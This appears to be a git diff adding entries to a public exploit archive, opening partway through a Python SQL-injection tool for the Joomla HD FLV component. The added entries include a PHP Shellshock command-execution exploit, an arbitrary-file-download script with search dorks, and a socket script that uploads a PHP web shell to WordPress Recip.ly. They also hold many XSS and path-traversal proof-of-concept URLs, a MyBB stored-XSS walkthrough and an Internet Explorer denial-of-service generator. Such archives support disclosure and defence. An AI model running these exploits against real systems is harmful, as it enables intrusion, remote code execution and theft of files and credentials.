if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
banner = """
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \
|___| | _ | _ | | | _ | |. 1 |. | \
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'
<= 2.1.0.1 Sql Injection
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
host = checkurl(options.target)
checkext = 0
evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }
char = "%2CNULL"
endurl = "%2CNULL%23"
bar = "#"
print(banner)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
try:
req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)
response = urllib2.urlopen(req).readlines()
for line_version in response:
if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:
checkext += 1
else:
checkext += 0
if checkext > 0:
sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
else:
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
sys.exit(1)
except urllib2.HTTPError:
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
sys.exit(1)
except urllib2.URLError as e:
print("\n[X] Connection Error: "+str(e.code))
sys.exit(1)
print("")
sys.stdout.write("\r[+] Checking Version: ")
try:
req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
response = urllib2.urlopen(req).readlines()
for line_version in response:
if not line_version.find("<version>") == -1:
VER = re.compile('>(.*?)<').search(line_version).group(1)
sys.stdout.write("\r[+] Checking Version: "+str(VER))
except urllib2.HTTPError:
sys.stdout.write("\r[+] Checking Version: Unknown")
except urllib2.URLError as e:
print("\n[X] Connection Error: "+str(e.code))
sys.exit(1)
print("")
for exploiting, dork in evilurl.iteritems():
s = ""
barcount = ""
for a in range(1,100):
s += char
try:
req = urllib2.Request(host+exploiting+s+endurl, None, headers)
response = urllib2.urlopen(req).read()
if "h0m3l4b1t" in response:
print "\n[!] VULNERABLE"
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
print "[*] Username: "+str(current_user)
print ""
print "[*] 3v1l Url: "+host+exploiting+s+endurl
sys.exit(0)
except urllib2.HTTPError as e:
response = e.read()
if "h0m3l4b1t" in response:
print "\n[!] VULNERABLE"
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
print "[*] Username: "+str(current_user)
print ""
print "[*] 3v1l Url: "+host+exploiting+s+endurl
sys.exit(0)
except urllib2.URLError as e:
print("\n[X] Connection Error: "+str(e.code))
sys.exit(1)
barcount += bar
sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
sys.stdout.flush()
print "\n[X] Not vulnerable :("
print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"

21
platforms/multiple/webapps/35248.txt Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: clientResponse Client Management XSS Vulnerability
# Date: 14-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v4.1
# Vendor Homepage:
http://codecanyon.net/item/clientresponse-responsive-php-client-management/3797780
# Tested on: Chrome & Iceweasel
# Vulnerability Description:
===Stored XSS===
The message system of script is not secure. You can run XSS payloads on
"Subject" and "Message" inputs. If you use "Subject" input for attack and
send the message to admin when admin login the system it will be directly
affect by vulnerability. Also profile section inputs are vulnerable.
Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>
=Solution=
Filter the input fields against to XSS attacks.
================

35
platforms/php/webapps/35146.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @
mail.c:283
if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(".","data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
// In Safe Mode, the user may only alter environment variables
whose names
// begin with the prefixes supplied by this directive.
// By default, users will only be able to set environment variables
that
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is
empty,
// PHP will let the user modify ANY environment variable!
mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually
send any mail
}
else return "Not vuln (not bash)";
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output != "") return $output;
else return "No output, or not vuln.";
}
shellshock($_REQUEST["cmd"]);
?>

80
platforms/php/webapps/35159.txt Executable file
View file

@ -0,0 +1,80 @@
Advisory ID: 92152
Product: MODX Revolution
Vendor: MODX
Vulnerable Version(s): 2.0.0?2.2.14
Tested Version: 2.2.14
Advisory Publication: 16 July, 2014 [without technical details]
Vendor Notification: 16 July, 2014
Vendor Patch: 15 July, 2014
Public Disclosure: 2 November , 2014
Vulnerability Type: CSRF Tokens Bypass + Reflected Cross Site Scripting + Stored XSS
CVE Reference: Requested
Risk Level: Critical
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
Patch - Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions
Reported By - Narendra Bhati ( R00t Sh3ll)
Security Analyst @ Suma Soft Pvt. Ltd. , Pune ( India )IT Risk & Security Management Services , Pune ( India)
Facebook - https://facebook.com/narendradewsoft
twitter - https://www.twitter.com/NarendraBhatiNB
Blog - http://hacktivity.websecgeeks.com
Email - bhati.contact@gmail.com
-----------------------------------------------------------------------------------------------
Advisory Details:
Narendra Bhati discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks & Along With Bypassing CSRF Tokens Protection ,Its allow an attacker to perform A CSRF Attack alosing With XSS to take over victim account by changin promary email address , Sending forged request Etc , Tricking an admin to attack on their own users by sending specially crafter malicous payload as CSRF Attack
1) Cross Site Request Forgery Protection (CSRF) Tokens Bypassing in Modx Revolution
The vulnerability exists due to insufficient validation of csrftokens ["HTTP_MODHAUTH] at server side which allow an attacker to Perform CSRF Attack by bypassing CSRF Protection Mechanism To take over victim account , Trick him to send malicious request Etc.
------------------------------------------------------------------------------------
2) Reflected Cross-Site Scripting (XSS) in MODX Revolution
The vulnerability exists due to insufficient sanitization of input data passed via the "context_key" HTTP GET parameter to "http://127.0.0.1/day/modx/manager/index.php?a=55&class_key=modStaticResource&context_key=" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
This vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.
The exploitation example below uses the ""></script><img src=x onerror=prompt(/XSS/)>" JavaScript function to display "/XSS/" word:
Vulnerable URL - http://127.0.0.1/day/modx/manager/index.php?a=55&class_key=modStaticResource&context_key="></script><img src=x onerror=prompt(/XSS/)>
Vulnerable Parameter - "context_key"
XSS Payload - "></script><img src=x onerror=prompt(/XSS/)>
"></script><img src=x onerror=prompt(document.cookie)>
-----------------------------------------------------------------------------------------------
3) Stored Cross-Site Scripting (XSS) in MODX Revolution
The vulnerability exists due to insufficient sanitization of input data passed via the "context" HTTP POST parameter to " http://127.0.0.1/day/modx/manager/index.php?id=1" URL. A local attacker [Authenticated User] can execute arbitrary HTML and script code in browser in context of the vulnerable website.
This vulnerability can be used against website visitors to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.
The exploitation example below uses the "<script>alert(1)</script>" JavaScript function to display "1" word:
Vulnerable URL - http://127.0.0.1/day/modx/manager/index.php?id=1
Vulnerable Parameter - "context"
XSS Payload - <script>alert(1)</script>
Note - This Stored XSS Was more critical because there was a CSRF protection vulnerability also , which allow an attacker to trick an administrator To Send Unwated Request for Stored XSS , which will directly attack to the Visitors ,
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions
More Information:
Public Advisory By Vendor :- http://forums.modx.com/thread/92152/critical-login-xss-csrf-revolution-2-2-1-4-and-prior
Public Disclosure With Tecnical Details - http://hacktivity.websecgeeks.com/modx-csrf-and-xss/
-----------------------------------------------------------------------------------------------

43
platforms/php/webapps/35193.txt Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: VLD Personal Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7
# Fixed Version 2.7.1
# Tested on: Windows / Linux
XSS Attack
Issue detail:
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c”><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.
Response :
GET /index.php?m=member_profile&p=profile&id=9811c”><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1
SQL Injection:
Issue detail:
The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1)) was submitted in the country parameter.
Response:
POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0
>age_from=19&age_to=19&issearch=1&submit=Search&gender1=2
>&gender2=2&type_id=members
>&country=
>1%20and%20benchmark(20000000%2csha1(1))%20
--
Talib Osmani

196
platforms/php/webapps/35246.py Executable file
View file

@ -0,0 +1,196 @@
#!/usr/bin/env python
#
# Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info:
# Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
# The variable "f" is not sanitized.
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/QvBTKFLBQ20
#
#
# Http connection
import urllib, urllib2
# String manipulation
import re
# Time management
import time
# Args management
import optparse
# Error management
import sys
banner = """
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \\
|___| | _ | _ | | | _ | |. 1 |. | \\
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'
<= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def checkcomponent(url,headers):
try:
req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
print("")
except urllib2.HTTPError:
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
sys.exit(1)
except urllib2.URLError:
print '[X] Connection Error'
def checkversion(url,headers):
try:
req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
response = urllib2.urlopen(req).readlines()
for line_version in response:
if not line_version.find("<version>") == -1:
VER = re.compile('>(.*?)<').search(line_version).group(1)
sys.stdout.write("\r[+] Checking Version: "+str(VER))
print("")
except urllib2.HTTPError:
sys.stdout.write("\r[+] Checking Version: Unknown")
except urllib2.URLError:
print("\n[X] Connection Error")
sys.exit(1)
def connection(url,headers,pathtrav):
char = "../"
bar = "#"
s = ""
barcount = ""
for a in range(1,20):
s += char
barcount += bar
sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
sys.stdout.flush()
try:
req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
response = urllib2.urlopen(req)
content = response.read()
if content != "" and not "failed to open stream" in content:
print("\n[!] VULNERABLE")
print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
print("")
print("[+] Do you want [D]ownload or [R]ead the file?")
print("[+]")
sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
download = set(['d'])
read = set(['r'])
while True:
choice = raw_input().lower()
if choice in download:
filedown = pathtrav.split('/')[-1]
urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
print("[!] DOWNLOADED!")
print("[!] Check file: "+filedown)
return True
elif choice in read:
print("")
print content
return True
else:
sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
except urllib2.HTTPError:
#print '[X] HTTP Error'
pass
except urllib2.URLError:
print '\n[X] Connection Error'
time.sleep(1)
print("\n[X] File not found or fixed component :(")
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file to check",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
pathtrav = options.file
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url,headers)
sys.stdout.write("\r[+] Checking Version: ")
checkversion(url,headers)
sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url,headers,pathtrav)

9
platforms/php/webapps/35253.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45976/info
web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
web@all 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/weball/404.php?url=1%3Cscript%3Ealert%280%29%3C%2fscript%3E

9
platforms/php/webapps/35254.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45983/info
PivotX is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PivotX 2.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/pivotx/pivotx/modules/module_image.php?image=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35255.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45984/info
The Uploader Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Uploader 1.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/uploader/views/notify.php?num=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35257.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45990/info
The WordPress Videox7 UGC Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Videox7 UGC 2.5.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss]

9
platforms/php/webapps/35258.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45991/info
The Audio plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Audio plugin 0.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/audio/getid3/demos/demo.browse.php?showfile=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35259.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45996/info
PivotX is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PivotX 2.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/includes/blogroll.php?id=1&color=123;}</style><script>alert("XSS");</script>|

9
platforms/php/webapps/35260.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45996/info
PivotX is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PivotX 2.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/includes/timwrapper.php?src=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

9
platforms/php/webapps/35261.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45997/info
The RSS Feed Reader WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RSS Feed Reader WordPress Plugin 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/rss-feed-reader/magpie/scripts/magpie_slashbox.php?rss_url=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35262.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45998/info
The WP Featured Post with Thumbnail Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP Featured Post with Thumbnail Plugin 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-featured-post-with-thumbnail/scripts/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35263.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46000/info
The WP Publication Archive Plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
An attacker can exploit this issue to download arbitrary files from the affected application. This may allow the attacker to obtain sensitive information; other attacks are also possible.
WP Publication Archive 2.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../windows/win.ini

9
platforms/php/webapps/35264.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46001/info
The Featured Content plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Featured Content 0.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss]

60
platforms/php/webapps/35265.php Executable file
View file

@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/46002/info
WordPress Recip.ly is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
WordPress Recip.ly 1.1.7 and prior versions are vulnerable.
import socket
host = &#039;localhost&#039;
path = &#039;/wordpress&#039;
shell_path = path + &#039;/wp-content/plugins/reciply/images/shell.php&#039;
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send(&#039;POST &#039; + path + &#039;/wp-content/plugins/reciply/uploadImage.php HTTP/1.1\r\n&#039;
&#039;Host: localhost\r\n&#039;
&#039;Proxy-Connection: keep-alive\r\n&#039;
&#039;User-Agent: x\r\n&#039;
&#039;Content-Length: 195\r\n&#039;
&#039;Cache-Control: max-age=0\r\n&#039;
&#039;Origin: null\r\n&#039;
&#039;Content-Type: multipart/form-data; boundary=----x\r\n&#039;
&#039;Accept: text/html\r\n&#039;
&#039;Accept-Encoding: gzip,deflate,sdch\r\n&#039;
&#039;Accept-Language: en-US,en;q=0.8\r\n&#039;
&#039;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n&#039;
&#039;\r\n&#039;
&#039;------x\r\n&#039;
&#039;Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n&#039;
&#039;Content-Type: application/octet-stream\r\n&#039;
&#039;\r\n&#039;
&#039;<?php echo \&#039;<pre>\&#039; + system($_GET[\&#039;CMD\&#039;]) + \&#039;</pre>\&#039;; ?>\r\n&#039;
&#039;------x--\r\n&#039;
&#039;\r\n&#039;)
resp = s.recv(8192)
http_ok = &#039;HTTP/1.1 200 OK&#039;
if http_ok not in resp[:len(http_ok)]:
print &#039;error uploading shell&#039;
return
else: print &#039;shell uploaded&#039;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send(&#039;GET &#039; + shell_path + &#039; HTTP/1.1\r\n&#039;\
&#039;Host: &#039; + host + &#039;\r\n\r\n&#039;)
if http_ok not in s.recv(8192)[:len(http_ok)]: print &#039;shell not found&#039;
else: print &#039;shell located at http://&#039; + host + shell_path
upload_shell()

105
platforms/php/webapps/35266.txt Executable file
View file

@ -0,0 +1,105 @@
*# Exploit Title*:[Stored XSS vulnerability in MyBB 1.8.2
*# Date:* 16th November'2014
*# Exploit Author:* Avinash Kumar Thapa
*# Vendor Homepage:* http://www.mybb.com/
*# Software Link*: http://www.mybb.com/download/
*# Version:* MyBB 1.8.2 (latest)
*# Tested on:*
* Operating System*: Windows 8.1
* Browser Used* : Mozilla Firefox 33.1 (localhost)
####################################################################################
The latest version of MyBB forums(1.8.2) is vulnerable to Stored Cross-Site
Scripting(XSS) vulnerability and Complete Proof of Concept is shown below:
*Stored XSS:*
*Step1: * Create a user account and go to *User CP >Edit Profile > **Custom
User Title*
*Vector Used : <img src=x onerror=alert('XSS');>*
*Post Request*
*POST /fuck/Upload/usercp.php HTTP/1.1*
*Host: localhost*
*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0*
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
*Accept-Language: en-US,en;q=0.5*
*Accept-Encoding: gzip, deflate*
*Referer: http://localhost/fuck/Upload/usercp.php?action=profile
<http://localhost/fuck/Upload/usercp.php?action=profile>*
*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
*Connection: keep-alive*
*Content-Type: application/x-www-form-urlencoded*
*Content-Length: 382*
*my_post_key=6fa6202df4adac5d50bd19b0c1204992&bday1=&bday2=&bday3=&birthdayprivacy=all&website=http%3A%2F%2F&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&profile_fields%5Bfid3%5D=Undisclosed&usertitle=%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3B%3E&icq=&aim=&yahoo=&skype=&google=&away=0&awayreason=&awayday=&awaymonth=&awayyear=&action=do_profile®submit=Update+Profile*
*Step 2: Go to http://localhost/fuck/upload/calendar.php
<http://localhost/fuck/upload/calendar.php>*
*Step 3: Create any event on any date and click on event.*
*REQUEST*
*GET /fuck/Upload/calendar.php?action=event&eid=9 HTTP/1.1*
*Host: localhost*
*User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0*
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8*
*Accept-Language: en-US,en;q=0.5*
*Accept-Encoding: gzip, deflate*
*Referer: http://localhost/fuck/Upload/calendar.php
<http://localhost/fuck/Upload/calendar.php>*
*Cookie: adminsid=d926efdecaa86cdba516a78abef57b47; acploginattempts=0;
mybb[lastvisit]=1416124581; mybb[lastactive]=1416126977; mybb[referrer]=1;
loginattempts=1; sid=c1ec3cf334b129e0f7e58f9ca9971aeb;
mybbuser=2_FWzmPOn8tKQhMm2urQwtHHx3iAJDWoB5kbyjjB2xwmbTXPpeAx*
*Connection: keep-alive*
*RESPONSE:*
HTTP/1.1 200 OK
Date: Sun, 16 Nov 2014 09:37:46 GMT
Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15
X-Powered-By: PHP/5.5.15
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11336
[SNIP]
<strong><span class="largetext"><a href="
http://localhost/fuck/Upload/member.php?action=profile&uid=3">avinash</a></span></strong><br
/>
<span class="smalltext">
<img src=x onerror=alert('XSS');><br />
<img src="images/star.png" border="0" alt="*" /><img src="images/star.png"
border="0" alt="*" /><img src="images/star.png" border="0" alt="*" /><img
src="images/star.png" border="0" alt="*" /><img src="images/star.png"
border="0" alt="*" /><br />
</span>
</div>
<div class="float_right" style="text-align: right;">
[snip]
Only XSS response is shown here :) not complete response to avoid junk :)
*Recommendation: *Upgrade MyBB 1.8.2 :)
*By:*
*Avinash Kumar Thapa a.k.a "-Acid" or "SPID3R"*
*Twitter: * https://twitter.com/m_avinash143
Facebook:https://www.facebook.com/M.avinash143
That's all for the day
Enjoy

17
platforms/windows/dos/35202.py Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: [ IE D.O.S ]
# Date: [10/28/2014]
# Exploit Author: [Behrooz Abbassi]
# Vendor Homepage: [http://microsoft.com]
# Software Link: [http://windows.microsoft.com/en-us/internet-explorer/download-ie]
# Version: [tested on 8 to 11]
# Tested on: [XP to 8.1 x64/x86]
FuckIE="""<!DOCTYPE html>\n<html>\n<head><title>IE D.O.S</title>\n</head>\n<body>\n %s </body>\n</html>\n"""
rubbish = """ <div class="First"><div class="Two"/> :-)<div class="Three"> </div>\n""" * 1021
IE_DOS =FuckIE %rubbish
file = open("IE_DOS.html", "w")
file.write(IE_DOS)
file.close()